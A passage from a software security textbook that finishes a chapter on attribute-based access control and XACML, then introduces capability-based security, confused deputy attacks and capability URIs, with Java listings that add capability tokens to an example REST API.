of several additional REST requests, including DELETE support, if you want
to try it out.
8.3.3
Policy agents and API gateways
ABAC enforcement can be complex as policies increase in complexity. Although gen-
eral-purpose rule engines such as Drools can simplify the process of writing ABAC rules,
specialized components have been developed that implement sophisticated policy
enforcement. These components are typically implemented either as a policy agent that
plugs into an existing application server, web server, or reverse proxy, or else as stand-
alone gateways that intercept requests at the HTTP layer, as illustrated in figure 8.4.
For example, the Open Policy Agent (OPA, https://www.openpolicyagent.org) imple-
ments a policy engine using a DSL designed to make expressing access control deci-
sions easy. It can be integrated into an existing infrastructure either using its REST
Policy agents
can plug into an
application server,
web server, or
reverse proxy.
Application server
API
Policy agent
Reverse proxy
Policy agent
HTTP requests
API gateway
Policy engine
Some API gateways
can also enforce
ABAC policies.
Figure 8.4
A policy agent can plug into an application server or reverse
proxy to enforce ABAC policies. Some API gateways can also enforce policy
decisions as standalone components.
290
CHAPTER 8
Identity-based access control
API or as a Go library, and integrations have been written for various reverse proxies
and gateways to add policy enforcement.
8.3.4
Distributed policy enforcement and XACML
Rather than combining all the logic of enforcing policies into the agent itself, another
approach is to centralize the definition of policies in a separate server, which provides
a REST API for policy agents to connect to and evaluate policy decisions. By centraliz-
ing policy decisions, a security team can more easily review and adjust policy rules for
all APIs in an organization and ensure consistent rules are applied. This approach is
most closely associated with XACML, the eXtensible Access-Control Markup Language
(see http://mng.bz/Qx2w), which defines an XML-based language for policies with a
rich set of functions for matching attributes and combining policy decisions. Although
the XML format for defining policies has fallen somewhat out of favor in recent years,
XACML also defined a reference architecture for ABAC systems that has been very
influential and is now incorporated into NIST’s recommendations for ABAC (http://
mng.bz/X0YG).
DEFINITION
XACML is the eXtensible Access-Control Markup Language, a
standard produced by the OASIS standards body. XACML defines a rich
XML-based policy language and a reference architecture for distributed pol-
icy enforcement.
The core components of the XACML reference architecture are shown in figure 8.5,
and consist of the following functional components:
A Policy Enforcement Point (PEP) acts like a policy agent to intercept requests to
an API and reject any requests that are denied by policy.
The PEP talks to a Policy Decision Point (PDP) to determine if a request should
be allowed. The PDP contains a policy engine like those you’ve seen already in
this chapter.
A Policy Information Point (PIP) is responsible for retrieving and caching values
of relevant attributes from different data sources. These might be local data-
bases or remote services such as an OIDC UserInfo endpoint (see chapter 7).
A Policy Administration Point (PAP) provides an interface for administrators to
define and manage policies.
The four components may be collocated or can be distributed on different machines.
In particular, the XACML architecture allows policy definitions to be centralized
within an organization, allowing easy administration and review. Multiple PEPs for dif-
ferent APIs can talk to the PDP via an API (typically a REST API), and XACML sup-
ports the concept of policy sets to allow policies for different PEPs to be grouped
together with different combining rules. Many vendors offer implementations of the
XACML reference architecture in some form, although often without the standard
XML policy language, providing policy agents or gateways and PDP services that you
291
Attribute-based access control
can install into your environment to add ABAC access control decisions to existing
services and APIs.
8.3.5
Best practices for ABAC
Although ABAC provides an extremely flexible basis for access control, its flexibility
can also be a drawback. It’s easy to develop overly complex rules, making it hard to
determine exactly who has access to what. I have heard of deployments with many
thousands of policy rules. Small changes to rules can have dramatic impacts, and it
can be hard to predict how rules will combine. As an example, I once worked on a sys-
tem that implemented ABAC rules in the form of XPath expressions that were applied
to incoming XML messages; if a message matched any rule, it was rejected.
It turned out that a small change to the document structure made by another team
caused many of the rules to no longer match, which allowed invalid requests to be
processed for several weeks before somebody noticed. It would’ve been nice to be able
The Policy
Enforcement Point
ensures access
control decisions
are enforced.
PEP
PDP
PAP
PIP
User
API
Policy admin
data
source
data
source
Data
sources
A Policy Decision
Point evaluates the
logic of access
control rules.
A Policy Administration Point
provides an interface to
define policies.
The Policy Information
Point gathers attributes
from information sources
and caches them.
Attributes can come from
local information sources
or remote API calls.
Figure 8.5
XACML defines four services that cooperate to implement an ABAC system. The
Policy Enforcement Point (PEP) rejects requests that are denied by the Policy Decision Point
(PDP). The Policy Information Point (PIP) retrieves attributes that are relevant to policy
decisions. A Policy Administration Point (PAP) can be used to define and manage policies.
292
CHAPTER 8
Identity-based access control
to automatically tell when these XPath expressions could no longer match any mes-
sages, but due to the flexibility of XPath, this turns out to be impossible to determine
automatically in general, and all our tests continued using the old format. This anec-
dote shows the potential downside of flexible policy evaluation engines, but they are
still a very powerful way to structure access control logic.
To maximize the benefits of ABAC while limiting the potential for mistakes, con-
sider adopting the following best practices:
Layer ABAC over a simpler access control technology such as RBAC. This pro-
vides a defense-in-depth strategy so that a mistake in the ABAC rules doesn’t
result in a total loss of security.
Implement automated testing of your API endpoints so that you are alerted
quickly if a policy change results in access being granted to unintended parties.
Ensure access control policies are maintained in a version control system so that
they can be easily rolled back if necessary. Ensure proper review of all policy
changes.
Consider which aspects of policy should be centralized and which should be left
up to individual APIs or local policy agents. Though it can be tempting to cen-
tralize everything, this can introduce a layer of bureaucracy that can make it
harder to make changes. In the worst case, this can violate the principle of least
privilege because overly broad policies are left in place due to the overhead of
changing them.
Measure the performance overhead of ABAC policy evaluation early and often.
Pop quiz
7
Which are the four main categories of attributes used in ABAC decisions?
a
Role
b
Action
c
Subject
d
Resource
e
Temporal
f
Geographic
g
Environment
8
Which one of the components of the XACML reference architecture is used to
define and manage policies?
a
Policy Decision Point
b
Policy Retrieval Point
c
Policy Demolition Point
d
Policy Information Point
e
Policy Enforcement Point
f
Policy Administration Point
The answers are at the end of the chapter.
293
Summary
Answers to pop quiz questions
1
True. Many group models allow groups to contain other groups, as discussed in
section 8.1.
2
a, c, d. Static and dynamic groups are standard, and virtual static groups are
nonstandard but widely implemented.
3
d. groupOfNames (or groupOfUniqueNames).
4
c, d, e. RBAC only assigns permissions using roles, never directly to individuals.
Roles support separation of duty as typically different people define role per-
missions than those that assign roles to users. Roles are typically defined for
each application or API, while groups are often defined globally for a whole
organization.
5
c. The NIST model allows a user to activate only some of their roles when creat-
ing a session, which enables the principle of least privilege.
6
d. The @RolesAllowed annotation determines which roles can all the method.
7
b, c, d, and g. Subject, Resource, Action, and Environment.
8
f. The Policy Administration Point is used to define and manage policies.
Summary
Users can be collected into groups on an organizational level to make them eas-
ier to administer. LDAP has built-in support for managing user groups.
RBAC collects related sets of permissions on objects into roles which can then
be assigned to users or groups and later revoked. Role assignments may be
either static or dynamic.
Roles are often specific to an API, while groups are more often defined stati-
cally for a whole organization.
ABAC evaluates access control decisions dynamically based on attributes of the
subject, the resource they are accessing, the action they are attempting to per-
form, and the environment or context in which the request occurs (such as the
time or location).
ABAC access control decisions can be centralized using a policy engine. The
XACML standard defines a common model for ABAC architecture, with sepa-
rate components for policy decisions (PDP), policy information (PIP), policy
administration (PAP), and policy enforcement (PEP).
294
Capability-based security
and macaroons
In chapter 8, you implemented identity-based access controls that represent the
mainstream approach to access control in modern API design. Sometimes identity-
based access controls can come into conflict with other principles of secure API
design. For example, if a Natter user wishes to share a message that they wrote with
a wider audience, they would like to just copy a link to it. But this won’t work unless
the users they are sharing the link with are also members of the Natter social space
it was posted to, because they won’t be granted access. The only way to grant those
users access to that message is to either make them members of the space, which
violates the principle of least authority (because they now have access to all the
messages in that space), or else to copy and paste the whole message into a differ-
ent system.
This chapter covers
Sharing individual resources via capability URLs
Avoiding confused deputy attacks against identity-
based access control
Integrating capabilities with a RESTful API design
Hardening capabilities with macaroons and
contextual caveats
295
Capability-based security
People naturally share resources and delegate access to others to achieve their
goals, so an API security solution should make this simple and secure; otherwise, your
users will find insecure ways to do it anyway. In this chapter, you’ll implement capability-
based access control techniques that enable secure sharing by taking the principle of
least authority (POLA) to its logical conclusion and allowing fine-grained control over
access to individual resources. Along the way, you’ll see how capabilities prevent a gen-
eral category of attacks against APIs known as confused deputy attacks.
DEFINITION
A confused deputy attack occurs when a component of a system with
elevated privileges can be tricked by an attacker into carrying out actions that
the attacker themselves would not be allowed to perform. The CSRF attacks
of chapter 4 are classic examples of confused deputy attacks, where the web
browser is tricked into carrying out the attacker’s requests using the victim’s
session cookie.
9.1
Capability-based security
A capability is an unforgeable reference to an object or resource together with a set
of permissions to access that resource. To illustrate how capability-based security dif-
fers from identity-based security, consider the following two ways to copy a file on
UNIX1 systems:
cp a.txt b.txt
cat <a.txt >b.txt
The first, using the cp command, takes as input the name of the file to copy and the
name of the file to copy it to. The second, using the cat command, instead takes as
input two file descriptors: one opened for reading and the other opened for writing. It
then simply reads the data from the first file descriptor and writes it to the second.
DEFINITION
A file descriptor is an abstract handle that represents an open file
along with a set of permissions on that file. File descriptors are a type of
capability.
If you think about the permissions that each of these commands needs, the cp com-
mand needs to be able to open any file that you can name for both reading and writ-
ing. To allow this, UNIX runs the cp command with the same permissions as your own
user account, so it can do anything you can do, including deleting all your files and
emailing your private photos to a stranger. This violates POLA because the command
is given far more permissions than it needs. The cat command, on the other hand,
just needs to read from its input and write to its output. It doesn’t need any permis-
sions at all (but of course UNIX gives it all your permissions anyway). A file descriptor
is an example of a capability, because it combines a reference to some resource along
with a set of permissions to act on that resource.
1 This example is taken from “Paradigm Regained: Abstraction Mechanisms for Access Control.” See http://
mng.bz/Mog7.
296
CHAPTER 9
Capability-based security and macaroons
Compared with the more dominant identity-based access control techniques dis-
cussed in chapter 8, capabilities have several differences:
Access to resources is via unforgeable references to those objects that also grant
authority to access that resource. In an identity-based system, anybody can
attempt to access a resource, but they might be denied access depending on
who they are. In a capability-based system, it is impossible to send a request to a
resource if you do not have a capability to access it. For example, it is impossible
to write to a file descriptor that your process doesn’t have. You’ll see in section
9.2 how this is implemented for REST APIs.
Capabilities provide fine-grained access to individual resources, and often sup-
port POLA more naturally than identity-based systems. It is much easier to dele-
gate a small part of your authority to somebody else by giving them some
capabilities without giving them access to your whole account.
The ability to easily share capabilities can make it harder to determine who
has access to which resources via your API. In practice this is often true for
identity-based systems too, as people share access in other ways (such as by
sharing passwords).
Some capability-based systems do not support revoking capabilities after they
have been granted. When revocation is supported, revoking a widely shared
capability may deny access to more people than was intended.
One of the reasons why capability-based security is less widely used than identity-based
security is due to the widespread belief that capabilities are hard to control due to easy
sharing and the apparent difficulty of revocation. In fact, these problems are solved by
real-world capability systems as discussed in the paper Capability Myths Demolished
by Mark S. Miller, Ka-Ping Yee, and Jonathan Shapiro (http://srl.cs.jhu.edu/pubs/
SRL2003-02.pdf). To take one example, it is often assumed that capabilities can be
used only for discretionary access control, because the creator of an object (such as a
file) can share capabilities to access that file with anyone. But in a pure capability system,
communications between people are also controlled by capabilities (as is the ability to
create files in the first place), so if Alice creates a new file, she can share a capability
to access this file with Bob only if she has a capability allowing her to communicate
with Bob. Of course, there’s nothing to stop Bob asking Alice in person to perform
actions on the file, but that is a problem that no access control system can prevent.
A brief history of capabilities
Capability-based security was first developed in the context of operating systems
such as KeyKOS in the 1970s and has been applied to programming languages and
network protocols since then. The IBM System/38, which was the predecessor of the
successful AS/400 (now IBM i), used capabilities for managing access to objects. In
the 1990s, the E programming language (http://erights.org) combined capability-based
security with object-oriented (OO) programming to create object-capability-based security
297
Capabilities and REST
9.2
Capabilities and REST
The examples so far have been based on operating system security, but capability-
based security can also be applied to REST APIs available over HTTP. For example,
suppose you’ve developed a Natter iOS app that allows the user to select a profile pic-
ture, and you want to allow users to upload a photo from their Dropbox account.
Dropbox supports OAuth2 for third-party apps, but the access allowed by OAuth2
scopes is relatively broad; typically, a user can grant access only to all their files or else
create an app-specific folder separate from the rest of their files. This can work well
when the application needs regular access to lots of your files, but in this case your
app needs only temporary access to download a single file chosen by the user. It vio-
lates POLA to grant permanent read-only access to your entire Dropbox just to upload
one photo. Although OAuth scopes are great for restricting permissions granted to
third-party apps, they tend to be static and applicable to all users. Even if you had a
scope for each individual file, the app would have to already know which file it needed
access to at the point of making the authorization request.2
To support this use case, Dropbox developed the Chooser and Saver APIs (see https://
www.dropbox.com/developers/chooser and https://www.dropbox.com/developers/
saver), which allow an app developer to ask the user for one-off access to specific files
in their Dropbox. Rather than starting an OAuth flow, the app developer instead calls
an SDK function that will display a Dropbox-provided file selection UI as shown in fig-
ure 9.1. Because this UI is implemented as a separate browser window running on
dropbox.com and not as part of the third-party app, it can show all the user’s files.
When the user selects a file, Dropbox returns a capability to the application that
allows it to access just the file that the user selected for a short period of time (4 hours
currently for the Chooser API).
(or ocaps), where capabilities are just normal object references in a memory-safe OO
programming language. Object-capability-based security fits well with conventional
wisdom regarding good OO design and design patterns, because both emphasize
eliminating global variables and avoiding static methods that perform side effects.
E also included a secure protocol for making method calls across a network using
capabilities. This protocol has been adopted and updated by the Cap’n Proto (https://
capnproto.org/rpc.html#security) framework, which provides a very efficient binary
protocol for implementing APIs based on remote procedure calls. Capabilities are
also now making an appearance on popular websites and REST APIs.
2 There are proposals to make OAuth work better for these kinds of transactional one-off operations, such as
https:/ /oauth.xyz, but these largely still require the app to know what resource it wants to access before it
begins the flow.
298
CHAPTER 9
Capability-based security and macaroons
The Chooser and Saver APIs provide a number of advantages over a normal OAuth2
flow for this simple file sharing use case:
The app author doesn’t have to decide ahead of time what resource it needs to
access. Instead, they just tell Dropbox that they need a file to open or to save
data to and Dropbox lets the user decide which file to use. The app never gets
to see a list of the user’s other files at all.
Because the app is not requesting long-term access to the user’s account, there
is no need for a consent page to ensure the user knows what access they are
granted. Selecting a file in the UI implicitly indicates consent and because the
scope is so fine-grained, the risks of abuse are much lower.
The UI is implemented by Dropbox and so is consistent for every app and web
page that uses the API. Little details like the “Recent” menu item work consis-
tently across all apps.
For these use cases, capabilities provide a very intuitive and natural user experience
that is also significantly more secure than the alternatives. It’s often assumed that
there is a natural trade-off between security and usability: the more secure a system is,
the harder it must be to use. Capabilities seem to defy this conventional wisdom,
because moving to a more fine-grained management of permissions allows more con-
venient patterns of interaction. The user chooses the files they want to work with, and
Figure 9.1
The Dropbox Chooser UI allows a user to select individual files to share
with an application. The app is given time-limited read-only access to just the files
the user selects.
299
Capabilities and REST
the system grants the app access to just those files, without needing a complicated con-
sent process.
DEFINITION
When the permission to perform an action is automatically
granted to all requests that originate from a given environment this is known
as ambient authority. Examples of ambient authority include session cookies
and allowing access based on the IP address a request comes from. Ambient
authority increases the risks of confused deputy attacks and should be
avoided whenever possible.
9.2.1
Capabilities as URIs
File descriptors rely on special regions of memory that can be altered only by privi-
leged code in the operating system kernel to ensure that processes can’t tamper or
create fake file descriptors. Capability-secure programming languages are also able to
prevent tampering by controlling the runtime in which code runs. For a REST API,
this isn’t an option because you can’t control the execution of remote clients, so
another technique needs to be used to ensure that capabilities cannot be forged or tam-
pered with. You have already seen several techniques for creating unforgeable tokens in
chapters 4, 5, and 6, using unguessable large random strings or using cryptographic
Confused deputies and ambient authority
Many common vulnerabilities in APIs and other software are variations on what is
known as a confused deputy attack, such as the CSRF attacks discussed in chapter
4, but many kinds of injection attack and XSS are also caused by the same issue.
The problem occurs when a process is authorized to act with your authority (as your
“deputy”), but an attacker can trick that process to carry out malicious actions. The
original confused deputy (http://cap-lore.com/CapTheory/ConfusedDeputy.html) was
a compiler running on a shared computer. Users could submit jobs to the compiler
and provide the name of an output file to store the result to. The compiler would also
keep a record of each job for billing purposes. Somebody realized that they could pro-
vide the name of the billing file as the output file and the compiler would happily over-
write it, losing all records of who had done what. The compiler had permissions to
write to any file and this could be abused to overwrite a file that the user themselves
could not access.
In CSRF, the deputy is your browser that has been given a session cookie after you
logged in. When you make requests to the API from JavaScript, the browser automat-
ically adds the cookie to authenticate the requests. The problem is that if a malicious
website makes requests to your API, then the browser will also attach the cookie to
those requests, unless you take additional steps to prevent that (such as the anti-
CSRF measures in chapter 4). Session cookies are an example of ambient authority:
the cookie forms part of the environment in which a web page runs and is transpar-
ently added to requests. Capability-based security aims to remove all sources of
ambient authority and instead require that each request is specifically authorized
according to POLA.
300
CHAPTER 9
Capability-based security and macaroons
techniques to authenticate the tokens. You can reuse these token formats to create
capability tokens, but there are several important differences:
Token-based authentication conveys the identity of a user, from which their per-
missions can be looked up. A capability instead directly conveys some permis-
sions and does not identify a user at all.
Authentication tokens are designed to be used to access many resources under
one API, so are not tied to any one resource. Capabilities are instead directly
coupled to a resource and can be used to access only that resource. You use dif-
ferent capabilities to access different resources.
A token will typically be short-lived because it conveys wide-ranging access to a
user’s account. A capability, on the other hand, can live longer because it has a
much narrower scope for abuse.
REST already has a standard format for identifying resources, the URI, so this is the
natural representation of a capability for a REST API. A capability represented as a
URI is known as a capability URI. Capability URIs are widespread on the web, in the
form of links sent in password reset emails, GitHub Gists, and document sharing as in
the Dropbox example.
DEFINITION
A capability URI (or capability URL) is a URI that both identifies
a resource and conveys a set of permissions to access that resource. Typi-
cally, a capability URI encodes an unguessable token into some part of the
URI structure.
To create a capability URI, you can combine a normal URI with a security token.
There are several ways that you can do this, as shown in figure 9.2.
https://api.example.com/resource?tok=abCd9..
https://api.example.com/resource#tok=abCd9..
https://api.example.com/resource/abCd9..
https://[email protected]/resource
The token can be encoded into the resource path . . .
. . . or into the query
parameters or fragment.
You can also encode the token
into the userinfo component.
Figure 9.2
There are many ways to encode a security token into a URI. You can
encode it into the resource path, or you can provide it using a query parameter. More
sophisticated representations encode the token into the fragment or userinfo
elements of the URI, but these require some client-side parsing.
301
Capabilities and REST
A commonly used approach is to encode a random token into the path component
of the URI, which is what the Dropbox Chooser API does, returning URIs like the
following:
https://dl.dropboxusercontent.com/1/view/8ygmwuqzf1l6x7c/
➥ book/graphics/CH08_FIG8.2_RBAC.png
In the Dropbox case, the random token is encoded into a prefix of the actual file
path. Although this is a natural representation, it means that the same resource may
be represented by URIs with completely different paths depending on the token, so a
client that receives access to the same resource through different capability URIs may
not be able to tell that they actually refer to the same resource. An alternative is to
pass the token as a query parameter, in which case the Dropbox URI would look like
the following:
https://dl.dropboxusercontent.com/1/view/
➥ book/graphics/CH08_FIG8.2_RBAC.png?token=8ygmwuqzf1l6x7c
There is a standard form for such URIs when the token is an OAuth2 token defined
by RFC 6750 (https://tools.ietf.org/html/rfc6750#section-2.3) using the parameter
name access_token. This is often the simplest approach to implement because it
requires no changes to existing resources, but it shares some security weaknesses with
the path-based approach:
Both URI paths and query parameters are frequently logged by web servers and
proxies, which can make the capability available to anybody who has access to
the logs. Using TLS will prevent proxies from seeing the URI, but a request may
still pass through several servers unencrypted in a typical deployment.
The full URI may be visible to third parties through the HTTP Referer header
or the window.referrer variable exposed to content running in an HTML
iframe. You can use the Referrer-Policy header and rel=”noreferrer”
attribute on links in your UI to prevent this leakage. See http://mng.bz/1g0g
for details.
URIs used in web browsers may be accessible to other users by looking at your
browser history.
To harden capability URIs against these threats, you can encode the token into the
fragment component or the URI or even the userinfo part that was originally designed
for storing HTTP Basic credentials in a URI. Neither the fragment nor the userinfo
component of a URI are sent to a web server by default, and they are both stripped
from URIs communicated in Referer headers.
302
CHAPTER 9
Capability-based security and macaroons
CAPABILITY URIS FOR REST APIS
The drawbacks of capability URIs just mentioned apply when they are used as a means
of navigating a website. When capability URIs are used in a REST API many of these
issues don’t apply:
The Referer header and window.referrer variables are populated by brows-
ers when a user directly navigates from one web page to another, or when one
page is embedded into another in an iframe. Neither of these apply to the typ-
ical JSON responses from an API because these are not directly rendered
as pages.
Similarly, because users don’t typically navigate directly to API endpoints, these
URIs will not end up in the browser history.
API URIs are also unlikely to be bookmarked or otherwise saved for a long
period of time. Typically, a client knows a few permanent URIs as entry points to
an API and then navigates to other URIs as it accesses resources. These resource
URIs can use short-lived tokens to mitigate against tokens being leaked in access
logs. This idea is explored further in section 9.2.3.
In the remainder of the chapter, you’ll use capability URIs with the token encoded
into the query parameter because this is simple to implement. To mitigate any threat
from tokens leaking in log files, you’ll use short-lived tokens and apply further protec-
tions in section 9.2.4.
Credentials in URIs: A lesson from history
The desire to share access to private resources simply by sharing a URI is not new.
For a long time, browsers supported encoding a username and password into a HTTP
URL in the form http:/ /alice:[email protected]/resource. When such a link was
clicked, the browser would send the username and password using HTTP Basic
authentication (see chapter 3). Though convenient, this is widely considered to be a
security disaster. For a start, sharing a username and password provides full access
to your account to anybody who sees the URI. Secondly, attackers soon realized that
this could be used to create convincing phishing links such as http:/ /www.google
.com:[email protected]/login.html. An unsuspecting user would see the google
.com domain at the start of the link and assume it was genuine, when in fact this is
just a username and they will really be sent to a fake login page on the attacker’s
site. To prevent these attacks, browser vendors have stopped supporting this URI
syntax and most now aggressively remove login information when displaying or follow-
ing such links. Although capability URIs are significantly more secure than directly
sharing a password, you should still be aware of any potential for misuse if you dis-
play URIs to users.
303
Capabilities and REST
9.2.2
Using capability URIs in the Natter API
To add capability URIs to Natter, you first need to implement the code to create a
capability URI. To do this, you can reuse an existing TokenStore implementation to
create the token component, encoding the resource path and permissions into the
token attributes as shown in listing 9.1. Because capabilities are not tied to an individ-
ual user account, you should leave the username field of the token blank. The token
can then be encoded into the URI as a query parameter, using the standard access
_token field from RFC 6750. You can use the java.net.URI class to construct the
capability URI, passing in the path and query parameters. Some of the capability URIs
you’ll create will be long-lived, but others will be short-lived to mitigate against tokens
being stolen. To support this, allow the caller to specify how long the capability should
live for by adding an expiry Duration argument that is used to set the expiry time of
the token.
Open the Natter API project3 and navigate to src/main/java/com/manning/
apisecurityinaction/controller and create a new file named CapabilityController.java
with the content of listing 9.1 and save the file.
Pop quiz
1
Which of the following are good places to encode a token into a capability URI?
a
The fragment
b
The hostname
c
The scheme name
d
The port number
e
The path component
f
The query parameters
g
The userinfo component
2
Which of the following are differences between capabilities and token-based
authentication?
a
Capabilities are bulkier than authentication tokens.
b
Capabilities can’t be revoked, but authentication tokens can.
c
Capabilities are tied to a single resource, while authentication tokens are
applicable to all resources in an API.
d
Authentication tokens are tied to an individual user identity, while capability
tokens can be shared between users
e
Authentication tokens are short-lived, while capabilities often have a longer
lifetime.
The answers are at the end of the chapter.
3 You can get the project from https://github.com/NeilMadden/apisecurityinaction if you haven’t worked
through chapter 8. Check out branch chapter09.
304
CHAPTER 9
Capability-based security and macaroons
package com.manning.apisecurityinaction.controller;
import com.manning.apisecurityinaction.token.SecureTokenStore;
import com.manning.apisecurityinaction.token.TokenStore.Token;
import spark.*;
import java.net.*;
import java.time.*;
import java.util.*;
import static java.time.Instant.now;
public class CapabilityController {
private final SecureTokenStore tokenStore;
public CapabilityController(SecureTokenStore tokenStore) {
this.tokenStore = tokenStore;
}
public URI createUri(Request request, String path, String perms,
Duration expiryDuration) {
var token = new Token(now().plus(expiryDuration), null);
token.attributes.put("path", path);
token.attributes.put("perms", perms);
var tokenId = tokenStore.create(request, token);
var uri = URI.create(request.uri());
return uri.resolve(path + "?access_token=" + tokenId);
}
}
You can now wire up code to create the CapabilityController inside your main
method, so open Main.java in your editor and create a new instance of the object
along with a token store for it to use. You can use any secure token store implementa-
tion, but for this chapter you’ll use the DatabaseTokenStore because it creates short
tokens and therefore short URIs.
NOTE
If you worked through chapter 6 and chose to mark the Database-
TokenStore as a ConfidentialTokenStore only, then you’ll need to wrap it in
a HmacTokenStore in the following snippet. Refer to chapter 6 (section 6.4) if
you get stuck.
You should also pass the new controller as an additional argument to the Space-
Controller constructor, because you will shortly use it to create capability URIs:
var database = Database.forDataSource(datasource);
var capController = new CapabilityController(
new DatabaseTokenStore(database));
var spaceController = new SpaceController(database, capController);
var userController = new UserController(database);
Listing 9.1
Generating capability URIs
Use an existing
SecureTokenStore
to generate tokens.
Leave the
username
null when
creating the
token.
Encode the
resource path
and permissions
into the token.
Add the token to the URI
as a query parameter.
305
Capabilities and REST
Before you can start generating capability URIs, though, you need to make one tweak
to the database token store. The current store requires that every token has an associ-
ated user and will raise an error if you try to save a token with a null username.
Because capabilities are not identity-based, you need to remove this restriction. Open
schema.sql in your editor and remove the not-null constraint from the tokens table
by deleting the words NOT NULL from the end of the user_id column definition. The
new table definition should look like the following:
CREATE TABLE tokens(
token_id VARCHAR(30) PRIMARY KEY,
user_id VARCHAR(30) REFERENCES users(user_id),
expiry TIMESTAMP NOT NULL,
attributes VARCHAR(4096) NOT NULL
);
RETURNING CAPABILITY URIS
You can now adjust the API to return capability URIs that can be used to access social
spaces and messages. Where the API currently returns a simple path to a social space
or message such as /spaces/1, you’ll instead return a full capability URI that can be
used to access it. To do this, you need to add the CapabilityController as a new
argument to the SpaceController constructor, as shown in listing 9.2. Open Space-
Controller.java in your editor and add the new field and constructor argument.
public class SpaceController {
private static final Set<String> DEFINED_ROLES =
Set.of("owner", "moderator", "member", "observer");
private final Database database;
private final CapabilityController capabilityController;
public SpaceController(Database database,
CapabilityController capabilityController) {
this.database = database;
this.capabilityController = capabilityController;
}
The next step is to adjust the createSpace method to use the CapabilityController
to create a capability URI to return, as shown in listing 9.3. The code changes are very
minimal: simply call the createUri method to create the capability URI. As the user
that creates a space is given full permissions over it, you can pass in all permissions
when creating the URI. Once a space has been created, the only way to access it will be
through the capability URI, so ensure that this link doesn’t expiry by passing a large
expiry time. Then use the uri.toASCIIString() method to convert the URI into a
properly encoded string. Because you’re going to use capabilities for access you can
remove the lines that insert into the user_roles table; these are no longer needed.
Listing 9.2
Adding the CapabilityController
Remove the NOT NULL
constraint here.
Add the
Capability-
Controller as
a new field
and con-
structor
argument.
306
CHAPTER 9
Capability-based security and macaroons
Open SpaceController.java in your editor and adjust the implementation of the create-
Space method to match listing 9.3. New code is highlighted in bold.
public JSONObject createSpace(Request request, Response response) {
var json = new JSONObject(request.body());
var spaceName = json.getString("name");
if (spaceName.length() > 255) {
throw new IllegalArgumentException("space name too long");
}
var owner = json.getString("owner");
if (!owner.matches("[a-zA-Z][a-zA-Z0-9]{1,29}")) {
throw new IllegalArgumentException("invalid username");
}
var subject = request.attribute("subject");
if (!owner.equals(subject)) {
throw new IllegalArgumentException(
"owner must match authenticated user");
}
return database.withTransaction(tx -> {
var spaceId = database.findUniqueLong(
"SELECT NEXT VALUE FOR space_id_seq;");
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(?, ?, ?);", spaceId, spaceName, owner);
var expiry = Duration.ofDays(100000);
var uri = capabilityController.createUri(request,
"/spaces/" + spaceId, "rwd", expiry);
response.status(201);
response.header("Location", uri.toASCIIString());
return new JSONObject()
.put("name", spaceName)
.put("uri", uri);
});
}
VALIDATING CAPABILITIES
Although you are returning a capability URL, the Natter API is still using RBAC to
grant access to operations. To convert the API to use capabilities instead, you can
replace the current UserController.lookupPermissions method, which determines
permissions by looking up the authenticated user’s roles, with an alternative that reads
the permissions directly from the capability token. Listing 9.4 shows the implementa-
tion of a lookupPermissions filter for the CapabilityController.
The filter first checks for a capability token in the access_token query parameter.
If no token is present, then it returns without setting any permissions. This will result
Listing 9.3
Returning a capability URI
Ensure the
link doesn’t
expire.
Create a
capability
URI with full
permissions.
Return the URI as a
string in the Location
header and JSON
response.
307
Capabilities and REST
in no access being granted. After that, you need to check that the resource being
accessed exactly matches the resource that the capability is for. In this case, you can
check that the path being accessed matches the path stored in the token attributes, by
looking at the request.pathInfo() method. If all these conditions are satisfied, then
you can set the permissions on the request based on the permissions stored in the
capability token. This is the same perms request attribute that you set in chapter 8
when implementing RBAC, so the existing permission checks on individual API calls
will work as before, picking up the permissions from the capability URI rather than
from a role lookup. Open CapabilityController.java in your editor and add the new
method from listing 9.4.
public void lookupPermissions(Request request, Response response) {
var tokenId = request.queryParams("access_token");
if (tokenId == null) { return; }
tokenStore.read(request, tokenId).ifPresent(token -> {
var tokenPath = token.attributes.get("path");
if (Objects.equals(tokenPath, request.pathInfo())) {
request.attribute("perms",
token.attributes.get("perms"));
}
});
}
To complete the switch-over to capabilities you then need to change the filters used to
lookup the current user’s permissions to instead use the new capability filter. Open
Main.java in your editor and locate the three before() filters that currently call user-
Controller::lookupPermissions and change them to call the capability controller
filter. I’ve highlighted the change of controller in bold:
before("/spaces/:spaceId/messages",
capController::lookupPermissions);
before("/spaces/:spaceId/messages/*",
capController::lookupPermissions);
before("/spaces/:spaceId/members",
capController::lookupPermissions);
You can now restart the API server, create a user, and then create a new social space.
This works exactly like before, but now you get back a capability URI in the response
to creating the space:
$ curl -X POST -H 'Content-Type: application/json' \
-d '{"name":"test","owner":"demo"}' \
-u demo:password https://localhost:4567/spaces
{"name":"test",
➥ "uri":"https://localhost:4567/spaces/1?access_token=
➥ jKbRWGFDuaY5yKFyiiF3Lhfbz-U"}
Listing 9.4
Validating a capability token
Look up the token from
the query parameters.
Check that the token
is valid and matches
the resource path.
Copy the permissions from
the token to the request.
308
CHAPTER 9
Capability-based security and macaroons
TIP
You may be wondering why you had to create a user and authenticate
before you could create a space in the last example. After all, didn’t we just
move away from identity-based security? The answer is that the identity is not
being used to authorize the action in this case, because no permissions are
required to create a new social space. Instead, authentication is required
purely for accountability, so that there is a record in the audit log of who cre-
ated the space.
9.2.3
HATEOAS
You now have a capability URI returned from creating a social space, but you can’t do
much with it. The problem is that this URI allows access to only the resource repre-
senting the space itself, but to read or post messages to the space the client needs to
access the sub-resource /spaces/1/messages instead. Previously, this wouldn’t be a
problem because the client could just construct the path to get to the messages and
use the same token to also access that resource. But a capability token gives access to
only a single specific resource, following POLA. To access the messages, you’ll need a
different capability, but capabilities are unforgeable so you can’t just create one! It
seems like this capability-based security model is a real pain to use.
If you are a RESTful design aficionado, you may know that having the client just
know that it needs to add /messages to the end of a URI to access the messages is a
violation of a central REST principle, which is that client interactions should be
driven by hypertext (links). Rather than a client needing to have specific knowledge
about how to access resources in your API, the server should instead tell the client
where resources are and how to access them. This principle is given the snappy title
Hypertext as the Engine of Application State, or HATEOAS for short. Roy Fielding, the
originator of the REST design principles, has stated that this is a crucial aspect of
REST API design (http://mng.bz/Jx6v).
PRINCIPLE
HATEOAS, or hypertext as the engine of application state, is a central
principle of REST API design that states that a client should not need to have
specific knowledge of how to construct URIs to access your API. Instead, the
server should provide this information in the form of hyperlinks and form
templates.
The aim of HATEOAS is to reduce coupling between the client and server that would
otherwise prevent the server from evolving its API over time because it might break
assumptions made by clients. But HATEOAS is also a perfect fit for capability URIs
because we can return new capability URIs as links in response to using another capa-
